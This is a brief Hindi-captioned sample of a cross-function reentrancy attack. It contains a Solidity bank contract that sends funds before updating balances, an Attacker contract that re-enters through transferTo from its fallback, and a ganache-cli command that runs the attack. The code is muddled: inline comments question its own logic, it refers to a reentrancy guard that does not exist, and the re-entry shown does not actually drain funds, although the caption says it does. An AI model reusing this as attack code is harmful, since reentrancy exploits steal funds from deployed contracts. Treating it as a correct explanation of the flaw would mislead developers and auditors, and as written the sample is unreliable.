
कमज़ोर Solidity कॉन्ट्रैक्ट और अटैकर कॉन्ट्रैक्ट सहित स्मार्ट कॉन्ट्रैक्ट्स के लिए क्रॉस-फ़ंक्शन रीएंट्रेंसी शोषण (reentrancy exploit) उदाहरण, जो fallback री-एंट्री के माध्यम से फंड निकासी का प्रदर्शन करता है।
// VulnerableBank.sol - Simplified reentrancy example with cross-function bypass
pragma solidity ^0.8.0;
contract VulnerableBank {
mapping(address => uint256) public balances;
function deposit() public payable {
balances[msg.sender] += msg.value;
}
function withdraw(uint256 amount) public {
require(balances[msg.sender] >= amount, "Insufficient balance");
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Transfer failed");
balances[msg.sender] -= amount;
}
// Second function that also modifies state after external call? Not present.
// Cross-function reentrancy: attacker calls withdraw(), which triggers fallback,
// then fallback calls another function that also transfers, bypassing nonReentrant if not global.
function transferTo(address to, uint256 amount) public {
require(balances[msg.sender] >= amount);
balances[msg.sender] -= amount;
balances[to] += amount;
}
}
// Attacker contract:
contract Attacker {
VulnerableBank bank;
constructor(address _bank) { bank = VulnerableBank(_bank); }
fallback() external payable {
if (address(bank).balance >= 1 ether) {
// Re-enter via transferTo instead of withdraw
bank.transferTo(address(this), 1 ether); // this changes balances mapping
// then later withdraw again? The point is to exploit reentrancy across functions.
}
}
function attack() public payable {
bank.deposit{value: 1 ether}();
bank.withdraw(1 ether);
}
}
एक स्मार्ट कॉन्ट्रैक्ट में वैश्विक रिएंट्रेंसी गार्ड का अभाव है, जिससे एक हमलावर withdraw कॉल के दौरान एक अलग फ़ंक्शन के माध्यम से कॉन्ट्रैक्ट में पुनः प्रवेश कर सकता है, स्थानीय गार्ड को बायपास कर सकता है और धनराशि निकाल सकता है।
withdraw फ़ंक्शन बाहरी कॉल के बाद शेष राशि को अपडेट करता है, और एक अलग स्टेट‑बदलने वाले फ़ंक्शन (transferTo) को रिएंट्रेंटली कॉल किया जा सकता है, जो balances में हेरफेर करता है।ganache-cli
attacker.attack({value: web3.utils.toWei("1", "ether")})